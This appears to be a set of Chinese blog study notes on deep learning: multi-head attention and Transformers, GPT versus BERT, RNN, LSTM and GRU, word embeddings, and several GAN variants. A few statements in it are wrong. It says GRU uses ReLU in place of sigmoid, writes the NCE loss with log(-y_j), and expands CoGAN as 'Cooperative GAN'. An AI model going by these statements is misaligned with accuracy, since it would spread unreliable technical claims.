简而言之:先加起来(而不是乘起来)然后用了一层非线性激活函数与矩阵乘法。

多头注意力机制(Multi-Head Attention)

为什么要使用多头注意力机制?

增加模型的表达能力:多头注意力机制可以让模型同时关注不同位置的信息,从而提高模型的表达能力。

你可能会想:一个单一的注意力矩阵(头)可以有多个热点,这已经足够了啊?单个注意力矩阵确实可以关注多个信息点,但多头注意力机制允许模型在多个独立的注意力环境中并行处理信息,每个头独立学习数据的不同方面或特征。这样,每个头都能捕捉到独特的信息点,通过综合所有头的输出,模型能够得到一个综合性更强、表达能力更丰富的数据表示。

举个例子,我们现在经常使用大模型,对于同样的提示,不同的大模型可以有不同的输出(关注不同的点),我们比较这些输出,就可以得到更加准确的结果(各取所长)。

多头注意力机制的计算过程

multi-head_attention

multi_head_attention_arch

对于一个输入序列,假设其长度为 $N$,嵌入维度(特征维度)为 $D$,头数为 $h$​(num_heads),则多头注意力计算过程如下:

输入矩阵

$\mathbf{Q}=\mathbf{K}=\mathbf{V}$,形状为:$(N,D)$

对于一共 $h$ 个注意力头,其中 $i$ 表示注意力头的索引,每个注意力头独立的 QKV 权重矩阵为:

$W_{Q_i}$、$W_{K_i}$、$W_{V_i}$,形状为:$(D,\text{head_dim})$

其中,$\text{head_dim} = \frac{D}{h}$,这里进行如此规定的原因为了保持输入输出的维度不变。

线性变换后的查询、键和值矩阵

$Q_i$、$K_i$、$V_i$,形状为:$(N,\text{head_dim})$

缩放点积注意力计算中的相似度矩阵

$Q_i \cdot K_i^T$,形状为:$(N,N)$

缩放点积注意力的输出

$\text{Attention}_i(Q_i,K_i,V_i)$,形状为:$(N,\text{head_dim})$

这里的改变来自于 $V_i$ 的尺寸变成了 $(N,\text{head_dim})$。

多头注意力的拼接输出

$\text{Concat_Attention}$,形状为:$(N,D)$,因为我们拼接了 $h$ 个头,每个头的维度为 $\text{head_dim}$,总维度为 $h \cdot \text{head_dim} = D$。

线性变换后的输出矩阵

$W_o$,形状为:$(D,D)$

多头注意力的输出

$\text{Multihead_Attention}(Q,K,V)$,形状为:$(N,D)$

总结

多头注意力:自注意力被划分为多个并行的子模块,每个子模块都有自己的权重矩阵,然后将这些子模块的输出拼接起来,再经过一个线性变换,得到最终的输出。多头注意力的每个头分别学习输入的不同部分的信息,通过将这些信息合并起来,可以捕捉到更多样化的特征。

Transformer

transformer

位置编码

原先的注意力机制 无法处理序列中的位置信息 (各个单词在 Self-Attention 中是各个位置都是并行处理的,而不像 RNN 是顺序处理的,后者可以通过顺序来表达位置信息),为了解决这个问题,Transformer 引入了位置编码(Positon Embedding)。

位置编码的维数和嵌入向量的维数相同,他们会被加到一起。

  • 句子 = 词 + 位置顺序排列
  • 词信息转为 词嵌入
  • 位置信息转为 位置嵌入
  • 表达句子的向量序列 = 词嵌入向量 + 位置嵌入向量

使用三角函数来编码位置信息,因为其具有连续性且周期性:

  1. 连续性:三角函数是连续的,可以表示很小的位置变化。使用正弦和余弦函数,可以确保位置编码的输出在 任何位置都是连续可导 的,这 对于基于梯度的优化算法来说是有益 的。
  2. 周期性:三角函数有周期性,可以帮助模型捕捉到句子中的模式,还可以对 任意长度 的序列进行编码。通过使用正弦和余弦函数的不同频率,模型还可以学习到 不同尺度 的位置关系。

具体来说,对于位置编码,每个维度的位置编码会交替使用 sin 和 cos 函数,其公式如下:

$$ \begin{aligned} &PE_{(pos, 2i)} = \sin\left(\frac{pos}{10000^{2i/d_{\text{model}}}}\right)\ &PE_{(pos, 2i+1)} = \cos\left(\frac{pos}{10000^{2i/d_{\text{model}}}}\right) \end{aligned} $$

position_encode

其中:

  • $PE_{(pos, 2i)}$ 表示位置 $pos$ 和维度 $2i$ 的位置编码
  • $PE_{(pos, 2i+1)}$ 表示位置 $pos$ 和维度 $2i+1$​ 的位置编码
  • 这张图中,横着是嵌入的维度顺序,竖着是输入向量的位置顺序。

这里的 $pos$ 是位置,$i$ 是嵌入向量的维度索引,$d_{\text{model}}$ 是嵌入向量的总维度。

通过这种方式,模型就可以根据正弦和余弦函数的值来判断单词的位置,进而理解单词的语序和句子结构。

这里可以看到,位置编码是硬编码的,但是在后续的发展中,此处转为了通过学习得到位置编码。

编码器

  1. 源输入序列经过嵌入层的处理得到 词嵌入,并 加上位置编码,得到最终的输入向量。

  2. 通过 多头注意力$h$ 组线性层 对词嵌入表示进行变换,将其映射为三个不同的空间,得到查询矩阵 Q、键矩阵 K 和值矩阵 V。

  3. 计算 缩放点积注意力输出。使用 Q、K、V 三个矩阵,按照缩放点积注意力的计算公式进行计算,得到输出矩阵。这个输出矩阵包含了每个词向量对于其他所有词向量的注意力权重。

  4. 将输入向量和注意力输出向量相加,得到 残差连接 的结果(类似 ResNet)。

  5. 对残差连接的结果进行 层规范化 (Layer Normalization)

    • 将每层的输出值归一化到均值为 0、方差为 1 的范围内。
    • 层规范化将每个神经元的输出值 $x$ 减去它在这一层的均值 $p$,然后除以标准差 $\sigma$,最后乘以可学习的缩放因子 $\alpha$,再加上可学习的偏置项 $\beta$。

    $$ \text{LayerNorm}(x)=\alpha\odot\frac{x-\mu}{\sqrt{\sigma^2+\epsilon}}+\beta $$

    Layer normalization 是对每个样本的所有特征进行归一化,而 Batch Normalization 是对每个通道的所有样本进行归一化。

  6. 逐位前馈网络(Feed-Forward Network, FFN)用于在自注意力机制之后进行 非线性变换。逐位前馈网络由两个全连接层和他们之间的一个 ReLU 激活函数组成。

    $$ \mathrm{FFN}(x)=\max(0,xW_1+b_1)W_2+b_2 $$

  7. 如果有 n 个编码器,则可以将它们 依次串联 起来。其中,第一个编码器的输入是词嵌入向量加上位置编码向量。

    $$ \mathrm{Transformer}(\mathbf{x})=\mathrm{Encoder}_n(\cdots(\mathrm{Encoder}_2(\mathrm{Encoder}_1(\mathbf{x})))) $$

  8. 最后一个编码器的输出就是最终的编码表示,它将用于传递给 解码器 进行下一步的处理(会由此得出解码器中的一部分所需的 K、V )。

解码器

目标序列嵌入和位置编码

encoder 的输出并没直接作为 decoder 的直接输入

  • 解码器的输入被称为目标序列。初始 decoder 的 time step 为 1 时(也就是第一次接收输入), 其输入为一个特殊的 token,即目标序列开始的 token(如 <BOS>,begin of sentence),也可能是其它视任务而定的输入等等,其目标则是预测翻译后的第 1 个单词(token)是什么
  • 然后 <BOS> 和预测出来的第 1 个单词一起,再次作为 decoder 的输入,得到第 2 个预测单词
  • 后续依此类推。直到遇到特殊的结束 token (如 <EOS>,end of sentence)或者达到最大输出长度为止。

目标序列首先经过嵌入层处理得到词嵌入,并加上 位置编码,得到最终的输入向量。

掩蔽多头注意力层(Masked Multihead Attention)

生成解码器自注意力矩阵,用于捕捉当前解码器状态与之前解码器状态的依赖关系。计算过程与编码器的自注意力矩阵相似。

目的:掩码(Mask)机制屏蔽了未来的序列信息,防止未来信息泄露到当前位置上。也即,在预测当前词时,只利用前面的词。

这里一共有多个步骤,请详细理解他们的含义:

  1. 创建一个掩码矩阵,形状为 $(N, N)$,其中 $N$ 是输入序列的长度。掩码矩阵的元素 设置为 $-\infty$(对应不给看)或 $0$(对应给看)
  2. 在 softmax 计算前,掩码矩阵与注意力分数相加,被掩盖位置的注意力分数变为负无穷,未掩盖位置不变。
  3. softmax 后,被掩盖位置对应的权重变为 $0$​,不影响当前位置。未掩盖位置正常转化。

为什么不直接使用在 softmax 后置零的方法?想想 softmax 的归一化操作是怎么实现的!

masked_multihead_attention

注意看这张图中,我们掩盖了注意力权重矩阵中的一半,使当前位置看不到未来信息。然后才去和 V 进行矩阵乘法。也即,需要在预测当前词时,只利用前面的词,而不使用后面的词。

编码器 - 解码器注意力层(Encoder-Decoder Attention)

目的:将编码器输出的信息融入到当前解码器状态中,帮助解码器更好地进行下一步预测。

在这个层中,查询向量 $Q$ 来自 前一个解码器层 的输出,而键向量 $K$ 和值向量 $V$ 来自 编码器 的输出。

逐位前馈网络和 AddNorm

结构同前文编码器。

解码器堆叠:堆叠 $n$ 个解码器层,前一个解码器的输出和对应编码器的输出是下一个解码器的输入。

第 1 个解码器层:

$$ \begin{aligned} Out_0&=PositionEncoding(Y)\ Out_1&=decoder_1(Out_0,E) \end{aligned} $$

第 $i$ 个解码器层 ($1<i\leq n$) :

$$ Out_i=decoder_i(Out_{i-1},E) $$

最后,我们可以对 最后一个解码器层 的输出施加 Softmax 函数来计算词汇表的概率分布:

$$ P_{vocab}=Softmax(W_out*Out_n+b_out) $$

如果你想要了解更多有关 Attention 机制的前沿技术,可以参考这篇质量很高的 综述

预训练模型(Pre-trained Models)

预训练模型是一种强大的技术,用于在 无标签数据 上学习 通用语言表示,从而提高 NLP 任务的性能。

无标签数据:指我们收集到的数据没有明确的标记或分类信息。

  1. 预训练阶段:在大量无标签文本数据上进行预训练,学习通用的语言表示。
  2. 微调阶段:针对特定任务进行 微调(fine-tune), 使模型适应各种 NLP 任务。

GPT(Generative Pre-Trained Transformer)

基于 Transformer 的预训练生成模型

  • 预训练:在大量无标签文本数据上进行预训练,学习通用的语言表示。
  • 学习 单向 上下文信息(仅使用左侧的上下文信息来预测当前词)。
  • 使用 多个 Transformer 的解码器 堆叠
  • 自回归训练:根据前面的文本预测下一个词的概率分布,从而学习语言模型。
  • 应用:文本生成、文本分类、问答系统等。

BERT

基于 Transformer 的双向编码器表示模型,学习 双向 上下文信息。

  • 预训练:在大量无标签文本数据上进行预训练,学习通用的语言表示。
  • 学习 双向 上下文信息(同时使用左侧和右侧的上下文信息预测当前词)。
  • 使用 多个 Transformer 的编码器 堆叠
  • 预训练任务:掩蔽语言模型(Masked Language Model,MLM)和下一句预测(Next Sentence Prediction,NSP)。
  • 应用:文本分类、问答系统、命名实体识别等。

差别

在 Transformer 架构中,编码器和解码器的设计有不同的目的。

编码器(Encoder)的设计目的是为了 理解输入文本的上下文关系。它通过自注意力机制(Self-Attention)来处理输入的文本,使得模型能够考虑到每个词与文本中其他词的关系。因此,BERT 使用多个编码器堆叠来更好地理解输入文本的双向上下文,这对于理解整个句子的含义非常重要。

解码器(Decoder)则是专注于生成文本。它不仅使用自注意力机制来理解已经生成的文本,还使用编码器 - 解码器注意力(Encoder-Decoder Attention)来 关注输入文本的哪些部分对于生成下一个词最为重要。GPT 使用多个解码器堆叠,因为它的目标是根据前面的文本生成下一个词,所以它不需要理解整个句子的双向上下文,只需要基于之前的词生成新的词即可。

简单来说,BERT 的目标是理解,所以用编码器;GPT 的目标是生成,所以用解码器。这就是为什么它们会选择不同的 Transformer 部件来堆叠。

大模型进化史

参数规模提升带来能力 “涌现 Emergent”:大型语言模型(LLM)在训练过程中学到的一种自发性的任务完成能力。模型基本结构和训练方式基本不变,只增大模型和数据规模,训练出的模型 “智能” 程度明显提高。

原因如下:

  1. 大量的训练数据:人类积累的所有信息,使模型有更丰富的知识基础。
  2. 模型容量:模型具有足够的容量来充分学习数据。
  3. 自回归和无监督训练:这种方式不需要标注海量数据,简化了训练过程。
  4. 迁移学习和微调:使模型能够适应不同任务,增强了模型的应用范围。
  5. 多任务学习:提高模型的泛化性,使其在多种任务上都能表现出色。

Credit

💾

循环神经网络

2024年4月20日 17:57

缘起

  • 多层感知器(MLP)和卷积神经网络(CNN)都属于前馈神经网络(Forward Neural Network,FNN),它们将一个数据样本作为输入,并输出一个结果,例如将图像输入并得到类标签。

  • 对于 时间序列(time-series)数据集,如语言、视频和生物信号,这些数据集无法适应前馈神经网络的框架。

  • 循环神经网络(RNN)是一种专为处理时间序列数据设计的深度学习架构。

词的表示

词的表示(Word Representation):将词转换为计算机可以理解的形式的过程。

词的表示方法有以下几种:

One-hot 编码

  • 将每个词表示为一个向量,向量的维度等于词汇表的大小
  • 大词汇量将导致 “维数灾难”
  • 所有单词表示都是独立的!太稀疏了!

one-hot

词袋模型(Bag of Words)

  • 使用单词频率表示数据
  • 大词汇量将导致 “维数灾难”
  • 丢失了单词的顺序信息

bag-of-words

词嵌入(Word Embedding)

  • 用一组浮点数向量来表示一个单词,也即将单词映射到一个连续的向量空间
  • 词嵌入是一个 密集的低维向量,与 one-hot 编码的 高维稀疏向量 形成对比
  • 词嵌入是通过训练得到的,可以学习到单词之间的语义关系

word-embedding

理想的词嵌入应该是:

  • 语义相似的单词在向量空间中距离较近,不相似的单词距离较远

  • 特征向量维度低于词汇表大小,可以减少维数灾难,可以理解为用高级特征表示单词

  • 允许进行 语义操作,如向量相加和相减 King − Man + Women = Queen

    这代表词嵌入中的特征包含了诸如 “性别” 和 “位置” 等 语义信息

嵌入的直观理解

3d_embedding

在这张我用 matplotlib 生成的三维图中,数据点的分布暗含一个特性:尽管数据点在三个维度($x, y, z$)上都有展开,但其实它们形成了一个平面上的圆形。从图中可以观察到,$x$ 坐标的变化对数据点在空间中的位置没有影响,这表明 $x$ 维度是多余的。通过识别和移除这种多余的维度,我们能够把数据从一个三维空间转换到一个二维空间,也就是所谓的 降维

在 AI 和机器学习中,这种 从更高维度数据中提取本质特征并将其 “嵌入” 到低维空间的过程被称为 “嵌入”。通过这个过程,我们能够发现并利用数据的内在结构,例如,在这张图片中,通过学习到数据呈圆形分布这一 语义信息,我们能找到一个更加简洁的表示形式,也就是一个只包含 $y$ 和 $z$ 的二维平面。

简而言之,你可以想象它是一种压缩和转换数据的方式,其不仅是嵌入数据到了在新的低维空间内,还能保留下来并抽象出数据的重要特性,而且还具有一些诸如相似者近、支持语义操作的特点。

嵌入的学习

如何学习词嵌入:现有的算法通过阅读大量文本文档来学习词嵌入表,以发现其中的模式,这是一种自监督(self-supervised) 学习方法。

Word2Vec

Word2Vec 是 Google 在 2013 年提出的一种词嵌入模型,它通过训练神经网络来学习单词的向量表示。

Word2Vec 有两种模型:Skip-gram 和 CBOW(Continuous Bag of Words)。

  • Skip-gram:通过一个词预测它周围的词(上下文),最大化正确的 上下文词的预测概率
  • CBOW:通过周围的词(上下文)预测一个中间的词,最大化正确的 中间词的预测概率

噪声对比估计 NCE(Noise Contrastive Estimation)

由于 Skip-Gram 有多个目标输出,所以使用 Sigmoid 函数而不是 Softmax。

词汇表中的每个单词都被分为 正样本和负样本,正样本是我们想要预测的单词,负样本是我们不想要预测的单词。我们希望模型能够区分正样本和负样本,并且我们独立地对每个单词进行分类。

Softmax 函数通常用于多分类问题中,它会考虑所有可能的输出类别,并给出一个概率分布,这些概率加起来总和为 1。在词嵌入的场景下,如果使用 Softmax,你需要对词汇表中的每个词计算一个概率(也即存在依赖),这在词汇表很大时会导致巨大的计算成本

Sigmoid 函数则不同,它是用于二分类问题的,它会对每个输出给出一个独立的概率值,这些概率值并不互相依赖,也不需要加起来等于 1。在 Skip-Gram 模型中,由于我们使用负采样,每个训练样本只需要区分一个正样本和少数几个负样本,而不是词汇表中的所有词。因此,使用 Sigmoid 函数可以大大减少计算量,因为它只需要对选定的正样本和负样本进行计算。

尽管更换为 Sigmoid 函数,在大词汇表下,如果对每个词汇都计算,依旧会导致巨大的计算成本,所以我们使用负采样来加速损失函数的计算,从词汇表中随机采样 N 个负样本纳入计算。

于是我们得到了 NCE 损失函数:

$$ E=-(\sum_{i\in pos}\log(y_i)+\sum_{j\in neg}\log(-y_j)) $$

其中:

  • $y_i$ 是正样本的预测概率
  • $y_j$ 是负样本的预测概率
  • pos 是正样本的索引集合
  • neg 是负样本的索引集合,大小为随机采样的数量 N

序列数据

sequential_data

序列数据是一种特殊的数据类型,它的每个样本都是一个序列(图中的绿色菱形,横向多个代表他们的出现顺序),序列中的每个元素都有其特定的位置和顺序。这是以往的前馈神经网络无法处理的数据类型(他们只能处理 One-to-One)。

举例:

  • one-to-many:输入一张图片,输出一段描述
  • many-to-one:输入一段文本,输出一个情感标签
  • many-to-many & seq2seq/async:输入一段文本,输出翻译后的另一段文本
  • many-to-many & sync:输入一段音频,输出文本

为了处理序列数据,我们引入了循环神经网络(RNN),通过添加隐状态(hidden state)来保留、处理序列中的信息。

朴素循环神经网络(Vanilla Recurrent Neural Network,RNN)

RNN 是一种专为处理序列数据设计的神经网络,它的每个时间步都会接收一个输入和上一步输出的隐状态,输出一个新的隐状态。

RNN 在时间序列的每一个时间点上,都会有一个隐藏状态向量 $h_t$,它包含了到当前时间点为止的序列信息。

通过添加隐状态,我们得以将信息传递到未来。

rnn_arch

rnn_arch

$$ \begin{array}{l}{{h_{t}=\tanh\left(W_{h}x_{t}+U_{h}h_{t-1}+b_{h}\right)}}\{{y_{t}=\sigma_{y}(W_{y}h_{t}+b_{y})}}\end{array} $$

其中:

  • $h_t$ 是时间步 $t$ 的隐状态
  • $x_t$ 是时间步 $t$ 的输入
  • $y_t$ 是时间步 $t$ 的输出
  • $W_h$、$U_h$、$b_h$ 是隐状态的参数
  • $W_y$、$b_y$ 是输出的参数
  • $\sigma_y$ 是输出的激活函数,$\sigma_h$ 就是 $\tanh$

局限性:隐状态的信息会随着时间步的增加而衰减(随着时间步的增加,$h_{t-1}$ 中包含的早期信息会逐渐被新的输入 $x_t$ 所稀释),这意味着 RNN 只能处理短序列,长序列的信息会被遗忘。也即很难维持较为长期的信息。

长短期记忆网络(Long Short-Term Memory,LSTM)

LSTM 是一种特殊的 RNN,它通过添加门控机制来控制信息的流动,从而解决了 RNN 的长期依赖问题。

门控向量是 LSTM 中用来控制信息流动的机制,通过门控单元可以决定什么信息被保留、遗忘或更新。门控向量中的值控制着信息流的多少:

  • 值接近 0 的时候,信息流被 “关闭”,即信息不会通过;
  • 值接近 1 的时候,信息流被 “打开”,即信息可以自由通过。

通过 逐元素(element-wise)相乘,也即将输入向量的每一个元素与门控向量的对应元素相乘,这样可以根据门控向量的值来筛选信息,只让部分信息通过。

LSTM 除了 RNN 引入的隐藏状态向量 $h_t$,还引入了细胞向量(也叫做细胞状态 $c_t$),这个向量专门设计来解决长期依赖问题,它能够在网络中保持长期的状态。

LSTM

LSTM 运算过程

计算遗忘门(Forget Gate)

遗忘门的作用是 决定我们要从细胞状态中丢弃什么信息。它通过下面的公式进行计算:

$$ f_t = sigmoid([h_{t-1}, x_t] W_f + b_f) $$

其中:

  • $f_t$: 遗忘门(forget gate)的值
  • $sigmoid$: sigmoid 激活函数,用来将值压缩到 0 和 1 之间
  • $[h_{t-1},x_t]$: 前一时刻的隐藏状态与当前时刻的输入数据 拼接
  • $W_f,b_f$: 遗忘门的权重矩阵、偏置项

随后,遗忘门的输出值 $f_t$ 会与前一时刻的细胞状态相乘,从而决定丢弃哪些信息:

$$ \boldsymbol{C_{t-1}'} = \boldsymbol{f_t} \odot \boldsymbol{C_{t-1}} $$

其中:

  • $\odot$: 点乘,即元素对应相乘

计算输入门(Input Gate)

输入门分为两部分:

  • 一个输出向量,决定我们要把 候选向量的哪些部分 添加到细胞状态中
  • 一个候选(信息)向量,决定我们要在细胞状态中存储那些新信息。
计算输入门的输出向量

在长短期记忆网络(LSTM)中,输入门的作用是控制当前输入和过去记忆的结合程度,而候选记忆(信息向量)则提供了可能添加到细胞状态的新信息。如果我们直接把输入门的输出加到记忆里,那么所有的输入都会不加选择地影响记忆状态,这样会使得网络缺乏选择性地忘记或保留信息的能力。

因而我们需要一个输出向量决定我们要往细胞状态中存储候选向量的那些部分。其通过如下公式计算:

$$ i_t = sigmoid([h_{t-1}, x_t] \boldsymbol{W_i} + b_i) $$

其中:

  • $i_t$: 输入门(input gate)的输出值
  • $\boldsymbol{W_i},b_i$: 输入门的权重矩阵、偏置项

计算输入门的信息向量(Information Vector)

信息向量包含了候选信息,这些信息可能(注意这里说的是可能,也就是后面要经过输出向量的点乘作用)会被添加到细胞状态中。它的计算方式为:

$$ \tilde{\boldsymbol{C_t}} = \tanh([h_{t-1}, x_t] \boldsymbol{W_C} + b_C) $$

其中:

  • $\tilde{\boldsymbol{C_t}}$: 当前时刻的信息向量(information vector)
  • $\boldsymbol{W_C},b_C$: 信息向量的权重矩阵、偏置项

计算新的细胞状态

新的细胞状态是通过结合遗忘门的结果(决定丢弃哪些信息)和输入门的结果(决定添加哪些新信息)来更新的:

$$ \begin{align} \boldsymbol{C_t} &= \boldsymbol{f_t} \odot \boldsymbol{C_{t-1}} + \boldsymbol{i_t} \odot \tilde{\boldsymbol{C_t}}\ &= \boldsymbol{C_{t-1}'} + \boldsymbol{i_t} \odot \tilde{\boldsymbol{C_t}} \end{align} $$

计算输出门(Output Gate)和新的隐藏状态

输出门决定了 下一时刻的隐藏状态,隐藏状态包含了过去信息,并通过输出门过滤:

$$ o_t = sigmoid([h_{t-1}, x_t] \boldsymbol{W}_o + b_o) $$

新的隐藏状态由 输出门和新的细胞状态 决定:

$$ h_t = o_t \odot \tanh(\boldsymbol{C_t}) $$

其中:

  • $o_t$: 输出门(output gate)的值
  • $\boldsymbol{W}_o,b_o$: 输出门的权重矩阵、偏置项
  • $h_t$: 当前时刻的隐藏状态

重要的相关问题

我们是否可以用 ReLU 来替换门控函数中的 Sigmoid 函数?

不行,因为 ReLU 函数的输出范围是 $[0, +\infty)$ ,而门控函数的输出范围是 $[0, 1]$ (更符合门控单元的定义),这样会导致信息流失。

不过也有一些变种的 LSTM 使用了 ReLU 来替换 Sigmoid 函数,如 GRU。

这里还要注意,门控都是 Sigmoid 函数

当向向量输入信息时,为什么我们使用 $\tanh$ 而不是 Sigmoid?

$\tanh$ 函数的输出范围是 $(-1, 1)$,而 Sigmoid 函数的输出范围是 $[0, 1]$,这样可以使得信息的变化范围更大,反向传播时更容易传递。

LSTM 的变体

有人做了研究,其实各种 LSTM 变体都没有明显的改进。

门控循环单元(GRU)不具有 cell state,并减少了 LSTM 的计算成本和内存使用。

门控循环单元(GRU)是一种简化的 LSTM,它将遗忘门和输入门合并为一个单一的更新门,同时也合并了细胞状态和隐藏状态。

GRU

时间序列的应用

many_to_one

one_to_many

sync_many_to_many

sync_many_to_many_2

注意这里,实际循环过程中一直给的是正确的下一词,而不是预测的下一词。

async_many_to_many

async_many_to_many_2

Credit

D2L / RNN

D2L / LSTM

💾

精选对抗神经网络

2024年4月20日 14:59

本节中,将主要介绍一下几种 GAN 的变体,以及他们相较于 Vanilla GAN 的改进。

条件对抗神经网络(Conditional GAN, cGAN)

条件对抗神经网络是对抗神经网络(GAN)的一种扩展,它通过 引入额外的条件信息,控制生成内容。这种方法能够解决多模态问题,即对于同一个条件,存在多种可能的输出。

最经典的一个生成任务就是,输入希望生成的图像类别标签,然后根据这个标签来生成图像,比如控制生成花、生成鸟、或者别的东西。

cGAN

损失函数

cGAN 的损失函数如下。

判别器损失 $\mathcal{L}_D$

$$ \begin{aligned} \mathcal{L}D =& -\mathbb{E}{x \sim p_{\text{data}}}[\log D_x(x)] - \mathbb{E}{z \sim p_z, c \sim p_c}[\log(1 - D_x(G(z, c)))] \&- \mathbb{E}{x \sim p_{\text{data}}}[\log D_c(x)] - \mathbb{E}_{z \sim p_z, c \sim p_c}[\log(1 - D_c(G(z, c)))] \end{aligned} $$

这个公式包含了两部分,第一部分是让判别器学会区分真假图像的能力,第二部分是让判别器学会正确识别图像类别的能力。

其中:

  • $p_{\text{data}}$ 是真实图像数据的分布
  • $c$ 是输入的条件标签
  • $p_z$ 是随机噪声的分布
  • $p_c$ 是条件标签的分布,指的是对于所有可能的标签 $c$,它们在数据集中出现的频率分布
  • $D_x$ 是判别器对图像真伪的判断
  • $D_c$ 是判别器对图像类别的判断
  • $G(z, c)$ 是生成器根据噪声 $z$ 和条件 $c$ 生成的图像

这里条件标签的分布理解起来可能是一个比较抽象的概念。不同于之前的 one-hot 编码,条件标签的分布 $p_c$ 是一个概率分布,用来描述条件标签的相对频率。这个分布可以是均匀的,也可以是非均匀的,取决于你想要模型学习的条件标签的多样性。

为什么要这么做?比如你想生成的是猫的图像,那么 $c$ 就是 "猫" 这个类别的标签。在实际应用中,条件标签 $c$ 确实是一个确定的值。但在训练模型时,我们会从条件标签的分布 $p_c$ 中进行采样,这是因为我们希望模型能够在多种不同的条件下都能够生成图像,而不是仅仅针对一个固定的条件。

所以,即使条件标签是离散的,我们仍然可以通过概率分布来描述在训练过程中各个标签被选中的相对频率。这就是所谓的条件标签的分布 $p_c$。

生成器损失 $\mathcal{L}_G$

$$ \begin{aligned} \mathcal{L}G =& -\mathbb{E}{z \sim p_z, c \sim p_c}[\log D_x(G(z, c))] \&- \mathbb{E}_{z \sim p_z, c \sim p_c}[\log D_c(G(z, c))] \end{aligned} $$

这个公式也包含两部分,第一部分是鼓励生成器生成让判别器认为是真的图像,第二部分是鼓励生成器生成的图像符合指定的类别标签。这里使用的是相同的符号含义,目的是最小化生成器的损失,即最大化判别器对生成图像的错误分类。

cGAN 的应用

cGAN_application

这里的 “条件” 可以是任何信息,如标签、描述、其他图片等,cGAN 利用这些信息来生成与条件相匹配的数据。

文本到图像的生成

在文本到图像的生成任务中,我们首先定义匹配的句子(matching text)和不匹配的句子(mismatching text)。如下图所示,每张图像都对应一些描述它的句子。

image_text_pair

我们的目标是让 GAN 学会区分匹配和不匹配的 文本 - 图像对,并能够基于文本描述生成相应的图像。

这里的模型设计架构如下:

cGAN_arch

其中,不同颜色的线和注释代表不同的训练步骤。1、2 是判别器的任务,3 是生成器的任务。

寻找潜在表示

寻找潜在表示 (Find Latent Representation):传统 GAN 只能从潜在空间 $Z$ 映射到数据空间 $X$,而没有从 $X$ 映射回 $Z$ 的能力。为了解决这个问题,我们可以通过优化方法或者学习一个编码器来找到潜在表示。

vae_and_gan

vae_and_gan_2

回想我们之前说的,VAE 拥有一个编码器,可以将 $X$ 映射到 $Z$,而 GAN 没有类似的能力。

为了使得 GAN 获得这样的编码器,我们可以设计如下两种方式来进行训练(但是他们都不是很好)。

基于优化的方法

  • 利用已训练好的 GAN 生成器 $G$
  • 通过优化隐空间向量 $Z$ 来生成与给定图像 $X$ 相似的图像,学习最好的 $Z$
  • 优化目标:$\min_{Z} |X - G(Z)|_2^2$ (使用 L2 范数)

find_latent_representation_1

暴力法:真正的编码器

  • 引入编码器 $E$,学习从图像 $X$ 到 $Z$ 的映射
  • 生成器 $G$ 固定,通过编码器 $E$ 快速获取 $Z$
  • 直接学习从图像到潜在空间

find_latent_representation_2

暴力法的缺点:编码器训练时没见过真图,而且生成器生成不了全部真实图像,会导致模式塌陷(Mode Collapse)。

mode_collapse

双向生成对抗网络(Bidirectional GAN,BiGAN)

双向生成对抗网络 BiGAN 引入了编码器,使得 GAN 不仅能从潜在空间到数据空间的映射,也能进行反向映射,即从数据空间映射回潜在空间。这使得 GAN 具备了特征编码的能力,增强了其应用范围。

训练过程

BiGAN 包括三个主要部分:生成器(G)、编码器(E)和判别器(D)。

  • 生成器(G):接收随机噪声 $Z$,输出生成的数据 $\hat{X}$。
  • 编码器(E):接收真实数据 $X$,输出编码表示 $\hat{Z}$。
  • 判别器(D):用来判断输入是来自生成器的输出还是编码器的输出。

训练过程

  1. 训练生成器:输入随机噪声 $Z$ 到生成器,生成 $\hat{X}$;同时把 $Z$ 和 $\hat{X}$ 一起给判别器。
  2. 训练编码器:输入真实数据 $X$ 到编码器,生成 $\hat{Z}$;同时把 $X$ 和 $\hat{Z}$ 一起给判别器。
  3. 判别器的目标:减小生成器和编码器输出的联合分布之间的差异。

数学表达

  • 联合分布 $p_G(\hat{X}, Z)$ 代表生成器的输出,可分解为 $p_G(X|Z)p(Z)$。
  • 联合分布 $p_E(X, \hat{Z})$ 代表编码器的输出,可分解为 $p_E(Z|X)p(X)$。
  • 训练目标:最小化生成器和编码器输出的联合分布之间的差异

BiGAN

最终目标

当生成器和编码器达到最优时,编码器将成为生成器的逆函数,即 $E=G^{-1}$。此时,$G(E(X))=X$ 和 $E(G(z))=Z$。

协同生成对抗网络(Cooperative GAN,CoGAN)

CoGAN 可以学习两个(语义相似)领域的联合分布 $p(X_A, X_B)$,并且能够同时生成两个领域的数据。两个领域的数据没有已知的映射关系。

CoGAN

CoGAN 的目标:

  • 让 $G_A$ 和 $G_B$ 生成尽可能真实的数据,以欺骗对应的判别网络 $D_A$ 和 $D_B$。
  • 让 $D_A$ 和 $D_B$ 能够区分真实数据与生成的数据。
  • 通过 共享权重 使得 $G_A$ 和 $G_B$ 生成的数据有相似的特征。

CoGAN_arch

CoGAN 通过 共享权重机制使得两个生成网络可以生成具有相似性质的数据,而不需要为每个数据集训练独立的模型。

主要应用:Unpaired Image-to-Image Translation(无配对图像到图像的转换)。

循环生成对抗网络(CycleGAN)

CycleGAN 是一种能够在两个不同领域之间进行图像转换的模型,即使这两个领域的图像没有一一对应的关系(没有已知的映射关系)

cycleGAN_target

cycleGAN_arch

CycleGAN 的核心思想是:

  • 使用两组生成网络和判别网络,分别记为 $G_{AB}$ 和 $G_{BA}$,以及 $D_A$ 和 $D_B$。
  • $G_{AB}$ 负责将领域 A 的图像转换成领域 B 的风格,而 $G_{BA}$ 则相反。
  • $D_A$ 和 $D_B$ 分别尝试区分自己领域中真实图像和生成的图像。

回顾一下,BiGAN(双向生成对抗网络)的对抗损失确实可以使得转换后的图像在新的领域中看起来真实,但是这种方法并没有直接的机制来确保转换过程中保留原图的关键信息。换句话说,虽然生成的图像可能会欺骗判别器,使其认为图像属于目标领域,但这并不保证原始图像的结构和内容在转换后依然完整。

为了保持图像内容的一致性,CycleGAN 引入了 循环一致性损失(cycle consistency loss),确保图像在经过两次转换(A 到 B,再 B 则 A)后,仍能回到原始状态(能够重构出原始图像)。这样就能够确保在图像风格转换的过程中,图像的内容得到保留。

CycleGAN 的目标

  • 让 $G_{AB}$ 和 $G_{BA}$ 生成的图像足够真实,以至于可以欺骗判别网络 $D_A$ 和 $D_B$。
  • 让 $D_A$ 和 $D_B$ 能够有效地区分出真实图像和生成图像。
  • 通过 循环一致性损失,确保图像在转换过程中保持内容不变。

主要应用:风格迁移、季节转换、照片增强等无配对图像到图像的转换任务。

CycleGAN 的缺陷

CycleGAN 的目标是确保图像在经过一系列转换后,仍然能够保留足够的信息,以便可以恢复到原始状态。

